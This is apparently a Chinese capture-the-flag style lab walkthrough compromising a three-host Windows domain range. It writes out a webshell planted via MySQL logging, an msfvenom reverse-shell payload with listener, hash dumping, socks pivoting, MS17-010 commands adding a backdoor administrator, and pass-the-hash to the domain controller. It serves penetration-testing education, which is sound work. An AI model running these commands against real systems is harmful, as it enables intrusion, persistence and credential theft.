靶场拓扑图

靶机环境分别为win7(外网)、win2008、win2003

win7:192.168.100.101 win2008:192.168.52.138 win2003:192.168.52.141 kali:192.168.100.246

web****渗透:

nmap扫描主机查看端口服务开放情况 发现开放了80端口的web服务和3306端口的mysql服务,对站点进行目录扫描 扫描发现了phpMyAdmin目录,访问弱口令root/root直接登录 进入后再sql语句执行处检查写入权限,发现并不支持写入 查看日志记录情况,发现日志也未开启 使用语句开启日志并设置日志记录到php文件 再次查询,修改成功 写入php一句话木马 蚁剑连接,发现是管理员权限,且存在域,判断域存在与否有很多方法,总结下几种常用的:

1、net time /domain   通过域控授时,若不存在域会显示找不到域控制器 2、ipconfig /all  若存在域则主DNS是域名 3、systeminfo   若存在域再域的一行会显示域名,否则会显示WORKGROUP

内网渗透: 进入kali,使用msf模块制作木马,这里的马子没有作免杀要注意关闭杀毒软件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.246 LPORT=4444 -f exe > /test.exe 利用蚁剑上传 在msf板块开启监听,利用蚁剑执行上线

use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lport 4444 set lhost 192.168.100.246 exploit -j

首先尝试getsystem提权,成功拿到system权限,这里也可以使用cs提权ms14_058,经测试也可以拿到权限 抓取用户hash值(需要system权限)

run hashdump

得到hash:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

ipconfig时发现192.168.52.0网段 尝试对52网段进行扫描,发现有存活机器

run arp_scanner -r 192.168.52.0/24

为方便进行信息收集,我们先建立一条对52网段的路由,设置端口1080,版本为4a,使用proxychains进行代理

run autoroute -s 192.168.52.0/24   查看路由表 run autoroute -p                                  检查路由表 background                                           返回 use auxiliary/server/socks_proxy   使用代理模块 set srvport 1080                                   设置端口 set version 4a                                        设置版本 run

配置kali socks代理,编辑/etc/proxychains4.conf,在[ProxyList]添加一条socks代理 0.0.0.0 1080         代理所有来自1080端口的流量 使用proxychains代理curl 192.168.52.138主机,得到回显说明我们代理配置成功 扫描常见端口

proxychains4 nmap -sT -Pn -p 20,21,22,23,24,25,80,443,445,3306,3389 192.168.52.141

扫描ms17-010,发现存在漏洞 尝试进一步利用,选择比较稳定的command利用模块,尝试执行net user执行成功

use auxiliary/admin/smb/ms17_010_command set COMMAND net user set rhost 192.168.52.141 exploit

添加用户

set COMMAND net user first yyds@123 /add

添加成功 把添加的用户加入管理员组

set COMMAND net localgroup administrators first /add

加入成功 尝试开启telnet服务

set COMMAND sc config tlntsvr start= auto set COMMAND net start telnet

开启成功 nmap扫描确认23端口开启

proxychains4 nmap -sT -Pn -p 23 192.168.52.141

本地连接telnet服务,输入刚才创建的账户登录,拿到141主机的shell 按照上面的方法同样我们也可以拿到138的域控主机,另外因为几台主机密码都一样所以也可以使用hash传递攻击,使用hash传递时要注意使用正向连接,因为138主机是不出网的

use exploit/windows/smb/psexec set payload windows/meterpreter/bind_tcp set lhost 192.168.100.246 set rhost 192.168.52.138 set smbuser 账户名 set smbpass LM:NTLM exploit

这里还有一个问题就是我在hash传递时使用msf hashdump出来的hash是报错的,可能是模块有点问题 于是我是用cs重新抓取了下hash,在msf中重新设置smbpass

set smbpass f26fb3ae03e93ab9c81667e9d738c5d9:b367819c0a8ccd792cad1d034f56a1fa

成功拿到138主机的shell,登录发现已经是system权限

总结:

靶场1考察比较基础的内网知识,需要掌握各操作系统的指令、经典的漏洞以及msf等工具的使用。